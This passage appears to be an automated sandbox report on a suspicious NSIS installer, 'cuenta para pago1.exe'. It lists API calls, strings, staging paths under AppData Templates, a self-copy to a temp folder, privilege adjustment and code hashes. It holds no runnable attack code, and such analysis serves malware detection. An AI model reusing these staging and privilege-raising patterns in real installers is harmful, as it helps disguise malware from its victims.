5564->5565 5566 40100c DefWindowProcW 5564->5566 5568 4010f3 5565->5568 5569 401179 5566->5569 5570 401073 CreateBrushIndirect FillRect DeleteObject 5568->5570 5571 4010fc 5568->5571 5570->5568 5572 401102 CreateFontIndirectW 5571->5572 5573 401167 EndPaint 5571->5573 5572->5573 5574 401112 6 API calls 5572->5574 5573->5569 5574->5573 5582 401904 5583 40193b 5582->5583 5584 402bbf 18 API calls 5583->5584 5585 401940 5584->5585 5586 40580b 69 API calls 5585->5586 5587 401949 5586->5587 5588 402d04 5589 402d16 SetTimer 5588->5589 5591 402d2f 5588->5591 5589->5591 5590 402d84 5591->5590 5592 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5591->5592 5592->5590 4302 403c06 4303 403d59 4302->4303 4304 403c1e 4302->4304 4306 403daa 4303->4306 4307 403d6a GetDlgItem GetDlgItem 4303->4307 4304->4303 4305 403c2a 4304->4305 4308 403c35 SetWindowPos 4305->4308 4309 403c48 4305->4309 4311 403e04 4306->4311 4320 401389 2 API calls 4306->4320 4310 4040de 19 API calls 4307->4310 4308->4309 4313 403c65 4309->4313 4314 403c4d ShowWindow 4309->4314 4315 403d94 SetClassLongW 4310->4315 4316 403d54 4311->4316 4372 40412a 4311->4372 4317 403c87 4313->4317 4318 403c6d DestroyWindow 4313->4318 4314->4313 4319 40140b 2 API calls 4315->4319 4322 403c8c SetWindowLongW 4317->4322 4323 403c9d 4317->4323 4321 404067 4318->4321 4319->4306 4324 403ddc 4320->4324 4321->4316 4331 404098 ShowWindow 4321->4331 4322->4316 4327 403d46 4323->4327 4328 403ca9 GetDlgItem 4323->4328 4324->4311 4329 403de0 SendMessageW 4324->4329 4325 40140b 2 API calls 4342 403e16 4325->4342 4326 404069 DestroyWindow EndDialog 4326->4321 4391 404145 4327->4391 4332 403cd9 4328->4332 4333 403cbc SendMessageW IsWindowEnabled 4328->4333 4329->4316 4331->4316 4335 403ce6 4332->4335 4336 403d2d SendMessageW 4332->4336 4337 403cf9 4332->4337 4346 403cde 4332->4346 4333->4316 4333->4332 4334 40603c 18 API calls 4334->4342 4335->4336 4335->4346 4336->4327 4339 403d01 4337->4339 4340 403d16 4337->4340 4385 40140b 4339->4385 

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 0 (graph image not preserved; first block 40326a-40329d)
                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE ref: 0040328D
                                                                                      • GetVersion.KERNEL32 ref: 00403293
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032BC
                                                                                      • #17.COMCTL32(00000007,00000009), ref: 004032DF
                                                                                      • OleInitialize.OLE32(00000000), ref: 004032E6
                                                                                      • SHGetFileInfoW.SHELL32(004206A8,00000000,?,000002B4,00000000), ref: 00403302
                                                                                      • GetCommandLineW.KERNEL32(00428200,NSIS Error), ref: 00403317
                                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\cuenta para pago1.exe",00000000), ref: 0040332A
                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\cuenta para pago1.exe",00000020), ref: 00403351
                                                                                        • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                                                        • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040348B
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040349C
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034A8
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034BC
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034C4
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034D5
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034DD
                                                                                      • DeleteFileW.KERNELBASE(1033), ref: 004034F1
                                                                                        • Part of subcall function 0040601A: lstrcpynW.KERNEL32(?,?,00000400,00403317,00428200,NSIS Error), ref: 00406027
                                                                                      • OleUninitialize.OLE32(?), ref: 004035BC
                                                                                      • ExitProcess.KERNEL32 ref: 004035DD
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004035F0
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040926C), ref: 004035FF
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040360A
                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\cuenta para pago1.exe",00000000,?), ref: 00403616
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403632
                                                                                      • DeleteFileW.KERNEL32(0041FEA8,0041FEA8,?,0042A000,?), ref: 0040368C
                                                                                      • CopyFileW.KERNEL32(C:\Users\user\Desktop\cuenta para pago1.exe,0041FEA8,?), ref: 004036A0
                                                                                      • CloseHandle.KERNEL32(00000000,0041FEA8,0041FEA8,?,0041FEA8,00000000), ref: 004036CD
                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FC
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403703
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403718
                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 0040373B
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403760
                                                                                      • ExitProcess.KERNEL32 ref: 00403783
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\cuenta para pago1.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\$C:\Users\user\Desktop$C:\Users\user\Desktop\cuenta para pago1.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                      • API String ID: 2488574733-2814670859
                                                                                      • Opcode ID: c7933ff0207dc42ed488cfd770cac36fd4143b1ba3a2b25aa7f82e1899741bfa
                                                                                      • Instruction ID: 73295983c26b9bc795aacbdf710e3d5853a553e8a558082b103844ae68e0e3ab
                                                                                      • Opcode Fuzzy Hash: c7933ff0207dc42ed488cfd770cac36fd4143b1ba3a2b25aa7f82e1899741bfa
                                                                                      • Instruction Fuzzy Hash: C3D1F470644200BBD720BF659D45A3B3AACEB8074AF10487EF541B62D2DB7D9D42CB6E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 133 (graph image not preserved; first block 4052b8-4052d3)
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405316
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405325
                                                                                      • GetClientRect.USER32(?,?), ref: 00405362
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405369
                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 0040538A
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040539B
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053AE
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053BC
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004053CF
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004053F1
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405405
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405426
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405436
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040544F
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040545B
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405334
                                                                                        • Part of subcall function 00404113: SendMessageW.USER32(00000028,?,?,00403F3F), ref: 00404121
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405478
                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000524C,00000000), ref: 00405486
                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 0040548D
                                                                                      • ShowWindow.USER32(00000000), ref: 004054B1
                                                                                      • ShowWindow.USER32(?,00000008), ref: 004054B6
                                                                                      • ShowWindow.USER32(00000008), ref: 00405500
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405534
                                                                                      • CreatePopupMenu.USER32 ref: 00405545
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405559
                                                                                      • GetWindowRect.USER32(?,?), ref: 00405579
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405592
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004055CA
                                                                                      • OpenClipboard.USER32(00000000), ref: 004055DA
                                                                                      • EmptyClipboard.USER32 ref: 004055E0
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004055EC
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004055F6
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040560A
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040562A
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405635
                                                                                      • CloseClipboard.USER32 ref: 0040563B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                      • String ID: {$&B
                                                                                      • API String ID: 590372296-2518801558
                                                                                      • Opcode ID: 2a917bbd3b44fd9cb5b6d0897a12355830e6d7475328c9c4ea58580c84b5c048
                                                                                      • Instruction ID: b072520f5ee80a331e4e918265d0c1a5052efaeab479527f9264255038cc5675
                                                                                      • Opcode Fuzzy Hash: 2a917bbd3b44fd9cb5b6d0897a12355830e6d7475328c9c4ea58580c84b5c048
                                                                                      • Instruction Fuzzy Hash: BDB13B71900208FFDB219F60DD89AAE7B79FB44355F10803AFA01B61A0C7755E92DF69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      [Figure: control-flow graph beginning at block 40580b-405831; nodes are marked Executed or Not Executed]
                                                                                      APIs
                                                                                      • DeleteFileW.KERNELBASE(?,?,77573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
                                                                                      • lstrcatW.KERNEL32(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,\*.*), ref: 0040587C
                                                                                      • lstrcatW.KERNEL32(?,00409014), ref: 0040589F
                                                                                      • lstrlenW.KERNEL32(?,?,00409014,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,77573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058A5
                                                                                      • FindFirstFileW.KERNELBASE(dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,?,00409014,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,?,77573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B5
                                                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405955
                                                                                      • FindClose.KERNEL32(00000000), ref: 00405964
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\cuenta para pago1.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      • API String ID: 2035342205-1035049153
                                                                                      • Opcode ID: e5205ecd88fce5ccf5828815dd77ba019690641696c58a1a3b737e95854e38d1
                                                                                      • Instruction ID: b6454d918ebd5faba2d20934ef042a1c7892e73fe5aa147b237895e66f915a66
                                                                                      • Opcode Fuzzy Hash: e5205ecd88fce5ccf5828815dd77ba019690641696c58a1a3b737e95854e38d1
                                                                                      • Instruction Fuzzy Hash: 0041BF71900A14FACB21AB658C89EBF7678EB41768F10817BF801751D1D77C4981DEAE
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      [Figure: control-flow graph beginning at block 405648-405693; nodes are marked Executed or Not Executed]
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                                                                      • GetLastError.KERNEL32 ref: 0040569F
                                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B4
                                                                                      • GetLastError.KERNEL32 ref: 004056BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$s@
                                                                                      • API String ID: 3449924974-3165040759
                                                                                      • Opcode ID: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                                                      • Instruction ID: 58cf5789918ac3341f57974bf76304b0811093b13c64c6dd82c549f991abc1cf
                                                                                      • Opcode Fuzzy Hash: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                                                      • Instruction Fuzzy Hash: 6D010871D14219DAEF119FA0D8487EFBFB8EF14354F40853AE909B6190D3799604CFAA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(?,00425738,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00405B1F,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,00000000,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, 4Ww,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,77573420,C:\Users\user\AppData\Local\Temp\), ref: 00406368
                                                                                      • FindClose.KERNEL32(00000000), ref: 00406374
                                                                                      Strings
                                                                                      • dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon, xrefs: 0040635D
                                                                                      • 8WB, xrefs: 0040635E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$CloseFileFirst
                                                                                      • String ID: 8WB$dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon
                                                                                      • API String ID: 2295610775-1340106231
                                                                                      • Opcode ID: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                                                      • Instruction ID: 8488419dd32d28aa1913c95702376fed147eab6209e3de196541cdf70887181d
                                                                                      • Opcode Fuzzy Hash: 4919aa1d8c56feb8b367bbb1b86ee1180edd575772c83518e79227edefbba0cf
                                                                                      • Instruction Fuzzy Hash: BED01231949120ABC31417786D0C88B7A599F553317218E33F82AF53E0C3348C2586E9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                                                      • Instruction ID: 8bf6f29b28aad36262c5774fab9fc5fc8376212b20b0a75e389b428f0a59168b
                                                                                      • Opcode Fuzzy Hash: 0e2f680ccc61635b902b5d27a35f9f4c181eb1db892f7aa35b7a4bb0f1103339
                                                                                      • Instruction Fuzzy Hash: B5F16571D00229CBCF18CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A9ACF44
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040280A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 46bfe881245e9c09c60a9812fea19b817693455353fba4155f8684d2f21f36a4
                                                                                      • Instruction ID: 35ddb734ec7d865f8f709f830fd12decc1a753c42de70ab183506872ff8e9077
                                                                                      • Opcode Fuzzy Hash: 46bfe881245e9c09c60a9812fea19b817693455353fba4155f8684d2f21f36a4
                                                                                      • Instruction Fuzzy Hash: 0DF08271A00114DBC711EFA4DD49AAEB374FF44324F20457BF115F21E1D7B899409B29
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      [Figure: control-flow graph beginning at block 403c06-403c18; nodes are marked Executed or Not Executed]
                                                                                      APIs
                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C42
                                                                                      • ShowWindow.USER32(?), ref: 00403C5F
                                                                                      • DestroyWindow.USER32 ref: 00403C73
                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403C8F
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403CB0
                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CC4
                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403CCB
                                                                                      • GetDlgItem.USER32(?,?), ref: 00403D79
                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403D83
                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00403D9D
                                                                                      • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403DEE
                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403E94
                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403EB5
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EC7
                                                                                      • EnableWindow.USER32(?,?), ref: 00403EE2
                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403EF8
                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403EFF
                                                                                      • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00403F17
                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F2A
                                                                                      • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 00403F53
                                                                                      • SetWindowTextW.USER32(?,004226E8), ref: 00403F67
                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040409B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                      • String ID: &B
                                                                                      • API String ID: 3282139019-3208460036
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 004063F4: GetModuleHandleA.KERNEL32(?,00000020,?,004032D3,00000009), ref: 00406406
                                                                                        • Part of subcall function 004063F4: GetProcAddress.KERNEL32(00000000,?), ref: 00406421
                                                                                      • GetUserDefaultUILanguage.KERNELBASE(00000002,77573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\cuenta para pago1.exe",00000000), ref: 0040387D
                                                                                        • Part of subcall function 00405F61: wsprintfW.USER32 ref: 00405F6E
                                                                                      • lstrcatW.KERNEL32(1033,004226E8), ref: 004038E4
                                                                                      • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,77573420), ref: 00403964
                                                                                      • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403977
                                                                                      • GetFileAttributesW.KERNEL32(Call), ref: 00403982
                                                                                      • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven), ref: 004039CB
                                                                                      • RegisterClassW.USER32(004281A0), ref: 00403A08
                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A20
                                                                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A55
                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403A8B
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403AB7
                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403AC4
                                                                                      • RegisterClassW.USER32(004281A0), ref: 00403ACD
                                                                                      • DialogBoxParamW.USER32(?,00000000,00403C06,00000000), ref: 00403AEC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                                                      • String ID: "C:\Users\user\Desktop\cuenta para pago1.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                                                      • API String ID: 606308-2580667394
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\cuenta para pago1.exe,00000400,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00402E1B
                                                                                        • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\cuenta para pago1.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405BF3
                                                                                        • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00405C15
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cuenta para pago1.exe,C:\Users\user\Desktop\cuenta para pago1.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\cuenta para pago1.exe",00403500,?), ref: 00402E67
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                      • String ID: "C:\Users\user\Desktop\cuenta para pago1.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\cuenta para pago1.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                      • API String ID: 4283519449-2554257175
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetVersion.KERNEL32(00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,?,004051B0,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,00000000,0040FEA0), ref: 004060FF
                                                                                      • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040617D
                                                                                      • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406190
                                                                                      • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004061CC
                                                                                      • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004061DA
                                                                                      • CoTaskMemFree.OLE32(?), ref: 004061E5
                                                                                      • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406209
                                                                                      • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,?,004051B0,Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll,00000000,00000000,0040FEA0), ref: 00406263
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.4057751095.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_cuenta para pago1.jbxd
                                                                                      Similarity
                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsqE113.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                      • API String ID: 900638850-1050849911
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Spidsgattedes\Pushwainling\,?,?,00000031), ref: 004017CD
